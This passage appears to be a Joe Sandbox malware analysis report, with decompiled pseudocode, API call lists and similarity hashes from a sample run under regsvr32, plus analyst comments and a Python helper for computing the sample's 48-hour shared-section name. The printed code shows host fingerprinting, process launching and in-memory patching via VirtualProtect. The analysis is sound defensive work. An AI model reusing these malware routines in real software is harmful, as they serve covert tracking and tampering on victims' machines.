                				}
                				_t64 = _t69;
                				E031F7452( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x31fa2d4 ^ 0x46d76429;
				} else {
					// First call with a NULL buffer only returns the required length (in characters) in _v8
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x31fa290, 0, _t50 + _t50); // _t50 wide characters
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								// Hash of the user name (E031F6576; its algorithm is not part of this dump) folded into word 0 of the ID block
								 *_t69 =  *_t69 ^ E031F6576(_v8 + _v8, _t63);
							}
							HeapFree( *0x31fa290, 0, _t62);
						}
					}
				}
                				_t61 = __imp__;
                				_v8 = _v8 & 0x00000000;
                				GetComputerNameW(0,  &_v8);
                				_t34 = _v8;
                				if(_t34 != 0) {
                					_t68 = RtlAllocateHeap( *0x31fa290, 0, _t34 + _t34);
                					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							// Same hash over the computer name, folded into word 3 of the ID block
							_t69[3] = _t69[3] ^ E031F6576(_v8 + _v8, _t63);
						}
                						HeapFree( *0x31fa290, 0, _t68);
                					}
                				}
				// cpuid (leaf 1): the four result registers are stored at _v28.._v16 and XORed into word 1,
				// so the ID block depends on user name, computer name and processor signature/feature bits
				// (the decompiler's ordering of the stores around the instruction is approximate)
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}
                0x031f5f8b
                0x031f5f93
                0x031f5f99
                0x031f5f9c
                0x031f5f9f
                0x031f5fa1
                0x031f5fa6
                0x031f5fa6
                0x031f5fac
                0x031f5fae
                0x031f5fbb
                0x031f601c
                0x031f5fbd
                0x031f5fc2
                0x031f5fc8
                0x031f5fcd
                0x031f5fdb
                0x031f5fdf
                0x031f5fee
                0x031f5ff5
                0x031f5ffc
                0x031f5ffc
                0x031f6007
                0x031f6007
                0x031f5fdf
                0x031f5fcd
                0x031f601e
                0x031f6024
                0x031f602e
                0x031f6030
                0x031f6035
                0x031f6044
                0x031f6048
                0x031f6053
                0x031f605a
                0x031f6061
                0x031f6061
                0x031f606d
                0x031f606d
                0x031f6048
                0x031f6076
                0x031f6078
                0x031f607b
                0x031f607d
                0x031f6080
                0x031f6083
                0x031f608d
                0x031f6091
                0x031f6095

                APIs
                • GetUserNameW.ADVAPI32(00000000,?), ref: 031F5FC2
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 031F5FD9
                • GetUserNameW.ADVAPI32(00000000,?), ref: 031F5FE6
                • HeapFree.KERNEL32(00000000,00000000), ref: 031F6007
                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 031F602E
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 031F6042
                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 031F604F
                • HeapFree.KERNEL32(00000000,00000000), ref: 031F606D
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: HeapName$AllocateComputerFreeUser
                • String ID: Ut
                • API String ID: 3239747167-8415677
                • Opcode ID: 3f88197ea2915cca44ce3b6282d152352283284cbd2b60b4e143911c173344de
                • Instruction ID: 18f2cdab9594fc3fd4d892741742c64bd5331e531b80b152a1d665fbe5a2fbfb
                • Opcode Fuzzy Hash: 3f88197ea2915cca44ce3b6282d152352283284cbd2b60b4e143911c173344de
                • Instruction Fuzzy Hash: 1D313A71A00209EFDB15EFA9DD80AAEB7F9FF4C200F244069E609D3250D735EA509B20
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 273 4be0b4d-4be0b6e call 4be730c 276 4be0c4e 273->276 277 4be0b74-4be0b75 273->277 278 4be0c54-4be0c63 VirtualProtect 276->278 279 4be0bda-4be0be1 277->279 280 4be0b77-4be0b7a 277->280 283 4be0c65-4be0c7b VirtualProtect 278->283 284 4be0c80-4be0c86 GetLastError 278->284 281 4be0be3-4be0be9 279->281 282 4be0c21-4be0c36 VirtualProtect 279->282 285 4be0ca5-4be0cb1 call 4be7347 280->285 286 4be0b80 280->286 281->282 287 4be0beb-4be0bf7 281->287 282->278 288 4be0c38-4be0c4c 282->288 289 4be0b86-4be0b8c 283->289 284->285 286->289 287->278 294 4be0bf9-4be0c06 VirtualProtect 287->294 295 4be0c1d-4be0c1f VirtualProtect 288->295 291 4be0bce-4be0bd5 289->291 292 4be0b8e-4be0b92 289->292 291->285 292->291 296 4be0b94-4be0bb0 lstrlen VirtualProtect 292->296 294->278 297 4be0c08-4be0c1c 294->297 295->278 296->291 298 4be0bb2-4be0bcc lstrcpy VirtualProtect 296->298 297->295 298->291
                APIs
                • lstrlen.KERNEL32(?,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F,04BC158F), ref: 04BE0B9A
                • VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000,?,00000000,04BE48E6), ref: 04BE0BAC
                • lstrcpy.KERNEL32(00000000,?), ref: 04BE0BBB
                • VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000,?,00000000,04BE48E6), ref: 04BE0BCC
                • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,04BEA510,00000018,04BE5756,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000), ref: 04BE0C02
                • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000,?,00000000,04BE48E6), ref: 04BE0C1D
                • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,04BEA510,00000018,04BE5756,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000), ref: 04BE0C32
                • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,04BEA510,00000018,04BE5756,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000), ref: 04BE0C5F
                • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000,?,00000000,04BE48E6), ref: 04BE0C79
                • GetLastError.KERNEL32(?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F,04BC158F), ref: 04BE0C80
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                • String ID:
                • API String ID: 3676034644-0
                • Opcode ID: 09a70ce9b572ca27c5fde267aa9d4b44562d1f7417f3a9a146cd0b04749fd9b4
                • Instruction ID: 6df0a759e5ce1bfad19336501a5dea07a207b913a4f3640a7eab7a793b05e122
                • Opcode Fuzzy Hash: 09a70ce9b572ca27c5fde267aa9d4b44562d1f7417f3a9a146cd0b04749fd9b4
                • Instruction Fuzzy Hash: 36414171A00B09DFDB21AFA6CC44EBAB7B8FB88314F008555E656A76A0D774F805DF20
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 299 31f1212-31f1235 call 31f21fa 302 31f123b-31f1254 call 31f7a9c call 4bd6fb0 299->302 303 31f1342-31f1349 299->303 307 31f125a-31f1261 302->307 308 31f1330-31f133d call 31f2c11 302->308 307->308 309 31f1267-31f1299 memset call 31f6ee4 307->309 308->303 313 31f129f-31f12c3 GetModuleHandleA GetProcAddress 309->313 314 31f1329 309->314 316 31f12c5-31f12e5 call 31f6cfd 313->316 317 31f1312 313->317 314->308 329 31f12e6 call 4bc380b 316->329 330 31f12e6 call 4bcfdc6 316->330 331 31f12e6 call 4bc6552 316->331 319 31f1319-31f1327 317->319 319->308 323 31f12e8-31f12f3 call 31f6cfd 326 31f1307-31f1310 GetLastError 323->326 327 31f12f5-31f1305 CloseHandle * 2 323->327 326->319 327->319 329->323 330->323 331->323
                C-Code - Quality: 73%
                			E031F1212(void* __eax, void* __ecx) {
                				long _v8;
                				char _v12;
                				void* _v16;
                				void* _v28;
                				long _v32;
                				void _v104;
                				char _v108;
                				long _t36;
                				intOrPtr _t40;
                				intOrPtr _t47;
                				intOrPtr _t50;
                				void* _t58;
                				void* _t68;
                				intOrPtr* _t70;
                				intOrPtr* _t71;
                
                				_t1 = __eax + 0x14; // 0x74183966
                				_t69 =  *_t1;
                				_t36 = E031F21FA(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
                				_v8 = _t36;
                				if(_t36 != 0) {
                					L12:
                					return _v8;
                				}
                				E031F7A9C( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                				_t40 = _v12(_v12);
                				_v8 = _t40;
                				if(_t40 == 0 && ( *0x31fa2b8 & 0x00000001) != 0) {
                					_v32 = 0;
                					asm("stosd");
                					asm("stosd");
                					asm("stosd");
                					_v108 = 0;
                					memset( &_v104, 0, 0x40);
					_t47 =  *0x31fa2d8; // 0x240d5a8
					_t18 = _t47 + 0x31fb3b3; // 0x73797325 = "%sys": an environment-variable path, expanded by ExpandEnvironmentStringsA inside E031F6EE4
					_t68 = E031F6EE4(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x31fa2d8; // 0x240d5a8
						_t19 = _t50 + 0x31fb760; // 0x5608d08: name of the export resolved below
						_t20 = _t50 + 0x31fb0af; // 0x4e52454b = "KERN": module name passed to GetModuleHandleA
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44; // sizeof(STARTUPINFOA)
							// E031F6CFD resolves an export whose name starts "Wow6" (see GetProcAddress(36776F57) in the API list);
							// calling it before and again with argument 1 after the process creation is consistent with
							// disabling and then restoring WOW64 file-system redirection (analyst inference, not shown in the dump)
							E031F6CFD();
							// Argument layout matches CreateProcessA(NULL, expanded path, NULL, NULL, FALSE, 0x4000000 = CREATE_DEFAULT_ERROR_MODE,
							// NULL, NULL, &STARTUPINFOA (_v108), &PROCESS_INFORMATION (_v32)); inference from the arguments, the callee name is not in the dump
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
							_push(1);
							E031F6CFD();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28); // PROCESS_INFORMATION.hThread
								CloseHandle(_v32); // PROCESS_INFORMATION.hProcess
							}
						}
                						}
                						HeapFree( *0x31fa290, 0, _t68);
                					}
                				}
                				_t70 = _v16;
                				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                				E031F2C11(_t70);
                				goto L12;
			}
                0x031f121a
                0x031f121a
                0x031f1229
                0x031f1232
                0x031f1235
                0x031f1342
                0x031f1349
                0x031f1349
                0x031f1244
                0x031f124c
                0x031f1251
                0x031f1254
                0x031f1269
                0x031f126f
                0x031f1270
                0x031f1273
                0x031f1279
                0x031f127c
                0x031f1281
                0x031f1289
                0x031f1295
                0x031f1299
                0x031f1329
                0x031f129f
                0x031f129f
                0x031f12a4
                0x031f12ab
                0x031f12bf
                0x031f12c3
                0x031f1312
                0x031f12c5
                0x031f12c6
                0x031f12cd
                0x031f12e6
                0x031f12e8
                0x031f12ec
                0x031f12f3
                0x031f130d
                0x031f12f5
                0x031f12fe
                0x031f1303
                0x031f1303
                0x031f12f3
                0x031f1321
                0x031f1321
                0x031f1299
                0x031f1330
                0x031f1339
                0x031f133d
                0x00000000

                APIs
                  • Part of subcall function 031F21FA: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,031F122E,?,?,?,?,00000000,00000000), ref: 031F221F
                  • Part of subcall function 031F21FA: GetProcAddress.KERNEL32(00000000,7243775A), ref: 031F2241
                  • Part of subcall function 031F21FA: GetProcAddress.KERNEL32(00000000,614D775A), ref: 031F2257
                  • Part of subcall function 031F21FA: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 031F226D
                  • Part of subcall function 031F21FA: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 031F2283
                  • Part of subcall function 031F21FA: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 031F2299
                • memset.NTDLL ref: 031F127C
                  • Part of subcall function 031F6EE4: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,031F1295,73797325), ref: 031F6EF5
                  • Part of subcall function 031F6EE4: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 031F6F0F
                • GetModuleHandleA.KERNEL32(4E52454B,05608D08,73797325), ref: 031F12B2
                • GetProcAddress.KERNEL32(00000000), ref: 031F12B9
                • HeapFree.KERNEL32(00000000,00000000), ref: 031F1321
                  • Part of subcall function 031F6CFD: GetProcAddress.KERNEL32(36776F57,031F60F7), ref: 031F6D18
                • CloseHandle.KERNEL32(00000000,00000001), ref: 031F12FE
                • CloseHandle.KERNEL32(?), ref: 031F1303
                • GetLastError.KERNEL32(00000001), ref: 031F1307
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                • String ID: Ut
                • API String ID: 3075724336-8415677
                • Opcode ID: 43f316231464f2ec7ee24ee11f328feb3a5194774b9ffcbe6984347eea943d07
                • Instruction ID: d4aa9ca85178933167ba19d17d49e5280a8e61d0c4f0f72524c79f245eb59ee4
                • Opcode Fuzzy Hash: 43f316231464f2ec7ee24ee11f328feb3a5194774b9ffcbe6984347eea943d07
                • Instruction Fuzzy Hash: 7E312A76900208FFDB14EFA4DC88E9EBBBCEF0C354F144569EA0AE7511D735A9858B60
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 74%
                			E031F30FD(intOrPtr __edx, void** _a4, void** _a8) {
                				intOrPtr _v8;
                				struct _FILETIME* _v12;
                				short _v56;
                				struct _FILETIME* _t12;
                				intOrPtr _t13;
                				void* _t17;
                				void* _t21;
                				intOrPtr _t27;
                				long _t28;
                				void* _t30;
                
                				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12); // 64-bit FILETIME in _v12 (low) / _v8 (high)
				// _aulldiv(FILETIME, 0x0000019254D38000): the divisor is 1,728,000,000,000 ticks of 100 ns = 172,800 s = 48 h,
				// so the quotient identifies the current two-day window and changes every 48 hours
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L031F8076();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x31fa2d8; // 0x240d5a8
				_t5 = _t13 + 0x31fb876; // 0x5608e1e
				_t6 = _t13 + 0x31fb59c; // 0x530025 = L"%S": format string for the section name
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L031F7D5A(); // _snwprintf(&_v56, 0x16, ...): builds the mapping name from the time-window quotient (full format not recovered in this dump)
				// INVALID_HANDLE_VALUE (pagefile-backed), SECURITY_ATTRIBUTES at 0x31fa304, PAGE_READWRITE (4), 0x1000 bytes
				_t17 = CreateFileMappingW(0xffffffff, 0x31fa304, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) { // ERROR_ALREADY_EXISTS: only a section another instance already created is accepted
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // FILE_MAP_READ | FILE_MAP_WRITE
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2; // ERROR_FILE_NOT_FOUND: the section was freshly created, i.e. no peer had published it; discard it
						L6:
						CloseHandle(_t30);
					}
				}
                				}
                				return _t28;
			}
                0x031f30fd
                0x031f3105
                0x031f3109
                0x031f310f
                0x031f3114
                0x031f3119
                0x031f311c
                0x031f311f
                0x031f3124
                0x031f3125
                0x031f3128
                0x031f312d
                0x031f3134
                0x031f313e
                0x031f3140
                0x031f3141
                0x031f3144
                0x031f3160
                0x031f3166
                0x031f316a
                0x031f31b8
                0x031f316c
                0x031f3179
                0x031f3189
                0x031f3191
                0x031f31a3
                0x031f31a7
                0x00000000
                0x00000000
                0x031f3193
                0x031f3196
                0x031f319b
                0x031f319d
                0x031f319d
                0x031f317b
                0x031f317d
                0x031f31a9
                0x031f31aa
                0x031f31aa
                0x031f3179
                0x031f31bf

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,031F3530,?,?,4D283A53,?,?), ref: 031F3109
                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 031F311F
                • _snwprintf.NTDLL ref: 031F3144
                • CreateFileMappingW.KERNELBASE(000000FF,031FA304,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 031F3160
                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,031F3530,?,?,4D283A53,?), ref: 031F3172
                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 031F3189
                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,031F3530,?,?,4D283A53), ref: 031F31AA
                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,031F3530,?,?,4D283A53,?), ref: 031F31B2
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                • String ID:
                • API String ID: 1814172918-0
                • Opcode ID: 2891b9e3fadfaaeb1db9e31703e7bbe41b35e558b0d5b828c4ca4bcde6eb4631
                • Instruction ID: 0d4430a2b203f028a7f11ae7a6b4fd14b681e2cfa64a30cff455d577824968fb
                • Opcode Fuzzy Hash: 2891b9e3fadfaaeb1db9e31703e7bbe41b35e558b0d5b828c4ca4bcde6eb4631
                • Instruction Fuzzy Hash: 4521C07AA00204BFD719FB68CC05F9E77B9EF8C750F254121FA1AE7290D77095858B60
                Uniqueness

                Uniqueness Score: -1.00%
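The function E031F30FD above keys the name of the shared section it opens on GetSystemTimeAsFileTime() divided by the 64-bit constant 0x0000019254D38000, so every running instance that shares the same 48-hour window computes the same name. The Python below reproduces that computation so an analyst can work out which window a given timestamp falls in and which values to try when searching a memory image or a sandbox trace for the section. This is an added example written for this page, not code from the sample or from the Joe Sandbox report; the only facts taken from the report are the divisor (high dword 0x192, low dword 0x54d38000) and that the quotient is formatted with _snwprintf. The exact format string is not recovered in the dump, so the functions below stop at the numeric quotient; the hex Unix timestamp taken from the sample's file name is used only as a realistic instant.

```python
"""48-hour time bucket used by E031F30FD for its CreateFileMappingW name.

Added example (not the sample's or the report's code). Only the divisor and
the use of the quotient as the section name come from the report.
"""
from datetime import datetime, timezone

# 0x0000019254D38000 = 1,728,000,000,000 ticks of 100 ns = 172,800 s = 48 h
DIVISOR = (0x192 << 32) | 0x54D38000

# FILETIME ticks between the FILETIME epoch (1601-01-01) and the Unix epoch (1970-01-01)
EPOCH_DIFF_100NS = 116_444_736_000_000_000

# Length of one window in seconds (exactly two days)
SECONDS_PER_BUCKET = DIVISOR // 10_000_000


def unix_to_filetime(unix_seconds: int) -> int:
    """Whole Unix seconds -> Windows FILETIME (100-ns ticks since 1601-01-01)."""
    return unix_seconds * 10_000_000 + EPOCH_DIFF_100NS


def filetime_to_unix(filetime: int) -> int:
    """Windows FILETIME -> whole Unix seconds (floor)."""
    return (filetime - EPOCH_DIFF_100NS) // 10_000_000


def section_bucket(unix_seconds: int) -> int:
    """The value the sample computes: GetSystemTimeAsFileTime() / DIVISOR."""
    return unix_to_filetime(unix_seconds) // DIVISOR


def bucket_window(bucket: int) -> tuple:
    """Unix-second interval [start, end) during which section_bucket() == bucket."""
    start = filetime_to_unix(bucket * DIVISOR)
    return start, start + SECONDS_PER_BUCKET


def window_iso(bucket: int) -> tuple:
    """Same window rendered as ISO-8601 UTC strings, for reports and timelines."""
    start, end = bucket_window(bucket)
    to_iso = lambda s: datetime.fromtimestamp(s, tz=timezone.utc).isoformat()
    return to_iso(start), to_iso(end)


def bucket_candidates(start_unix: int, end_unix: int) -> list:
    """Every bucket value a host could have used between two instants.

    A section created in an earlier window stays alive only while its creator
    runs, so a hunt over a date range has to try every value in the range,
    not just the one for 'now'.
    """
    first, last = section_bucket(start_unix), section_bucket(end_unix)
    return list(range(first, last + 1))


if __name__ == "__main__":
    # 0x61f11309 is the leading part of the sample's file name (61f113091fd0c),
    # read here as a Unix timestamp purely to have a realistic instant.
    seen = 0x61F11309
    b = section_bucket(seen)
    lo, hi = window_iso(b)
    print(f"bucket {b} covers {lo} .. {hi}")
    print("candidates for that day and the next:", bucket_candidates(seen, seen + 86_400))
```

Because 1,728,000,000,000 ticks is exactly two days and the FILETIME epoch is midnight, every window starts at 00:00 UTC on an even-numbered day counted from 1601-01-01, which is why bucket_window() returns whole days; the second call of E031F30FD on a host that crossed such a boundary will therefore fail with the return value 2 until a peer has created the section under the new name.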

                Control-flow Graph

                APIs
                  • Part of subcall function 04BD7254: VirtualProtect.KERNELBASE(?,00000000,00000040,00000004,00000000,?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6), ref: 04BD7279
                  • Part of subcall function 04BD7254: GetLastError.KERNEL32(?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F,04BC158F), ref: 04BD7281
                  • Part of subcall function 04BD7254: VirtualQuery.KERNEL32(?,00000000,0000001C,?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F), ref: 04BD7298
                  • Part of subcall function 04BD7254: VirtualProtect.KERNEL32(?,00000000,-2C9B417C,00000004,?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6,04BDCCD7), ref: 04BD72BD
                • GetLastError.KERNEL32(00000000,00000004,00000002,00000000,?,00000000,00000000,04BEA580,0000001C,04BDBB7F,00000002,?,00000001,00000000,04BED514,00000000), ref: 04BD8E27
                  • Part of subcall function 04BD4D6C: lstrlen.KERNEL32(8B000000,04BCB526,?,04BCB526,00000004), ref: 04BD4DA4
                  • Part of subcall function 04BD4D6C: lstrcpy.KERNEL32(00000000,8B000000), ref: 04BD4DBB
                  • Part of subcall function 04BD4D6C: StrChrA.SHLWAPI(00000000,0000002E,?,04BCB526,00000004), ref: 04BD4DC4
                  • Part of subcall function 04BD4D6C: GetModuleHandleA.KERNEL32(00000000,?,04BCB526,00000004), ref: 04BD4DE2
                • VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,8B000000,?,00000004,00000000,00000004,00000002,00000000,?), ref: 04BD8DA5
                • VirtualProtect.KERNELBASE(04BCB73B,00000004,00000002,00000002,?,00000004,00000000,00000004,00000002,00000000,?,00000000,00000000,04BEA580,0000001C,04BDBB7F), ref: 04BD8DC0
                • RtlEnterCriticalSection.NTDLL(04BEE480), ref: 04BD8DE4
                • RtlLeaveCriticalSection.NTDLL(04BEE480), ref: 04BD8E02
                  • Part of subcall function 04BD7254: SetLastError.KERNEL32(00000000,?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F,04BC158F), ref: 04BD72C6
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                • String ID:
                • API String ID: 899430048-3916222277
                • Opcode ID: 5e8a1a1f97a514168e95f2f7b3ae5782d913e55d2b31f1389fe11b65696aec7d
                • Instruction ID: ba07865a0266fa328b0f1618189e65713d085fe294cf4edca87edcb77a22bce1
                • Opcode Fuzzy Hash: 5e8a1a1f97a514168e95f2f7b3ae5782d913e55d2b31f1389fe11b65696aec7d
                • Instruction Fuzzy Hash: 03417271900615EFDB11EF69C844AADFBB4FF48310F14819AE929AB290E734F951CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 410 4bd4428-4bd4467 call 4bce4dc VirtualAlloc 413 4bd446d-4bd4478 call 4bce4dc 410->413 414 4bd4538 410->414 419 4bd447d-4bd4483 413->419 416 4bd4540-4bd4542 414->416 417 4bd4544-4bd454c VirtualFree 416->417 418 4bd4552-4bd455d 416->418 417->418 420 4bd44ab-4bd44ad 419->420 421 4bd4485-4bd4489 419->421 420->414 423 4bd44b3-4bd44b7 420->423 421->420 422 4bd448b-4bd44a9 VirtualFree VirtualAlloc 421->422 422->413 422->420 423->414 424 4bd44b9-4bd44c4 423->424 424->416 425 4bd44c6 424->425 426 4bd44cc-4bd44d9 425->426 427 4bd44db-4bd44e4 lstrcmpi 426->427 428 4bd4515-4bd452f 426->428 427->428 429 4bd44e6-4bd44f1 StrChrA 427->429 428->416 430 4bd4531-4bd4536 428->430 431 4bd4501-4bd4511 429->431 432 4bd44f3-4bd44ff lstrcmpi 429->432 430->416 431->426 433 4bd4513 431->433 432->428 432->431 433->416
                APIs
                  • Part of subcall function 04BCE4DC: GetProcAddress.KERNEL32(?,00000318), ref: 04BCE501
                  • Part of subcall function 04BCE4DC: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 04BCE51D
                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 04BD4461
                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04BD454C
                  • Part of subcall function 04BCE4DC: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 04BCE687
                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 04BD4497
                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04BD44A3
                • lstrcmpi.KERNEL32(?,00000000), ref: 04BD44E0
                • StrChrA.SHLWAPI(?,0000002E), ref: 04BD44E9
                • lstrcmpi.KERNEL32(?,00000000), ref: 04BD44FB
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                • String ID:
                • API String ID: 3901270786-0
                • Opcode ID: 4da3c4b170d46859d980aed3380337926b1f39589672f6ea3fe80433b3fe49c3
                • Instruction ID: 405ad31f2e7d5df1f75732e76ab78fcdefdb27197a38f9acf228e12b389c3a72
                • Opcode Fuzzy Hash: 4da3c4b170d46859d980aed3380337926b1f39589672f6ea3fe80433b3fe49c3
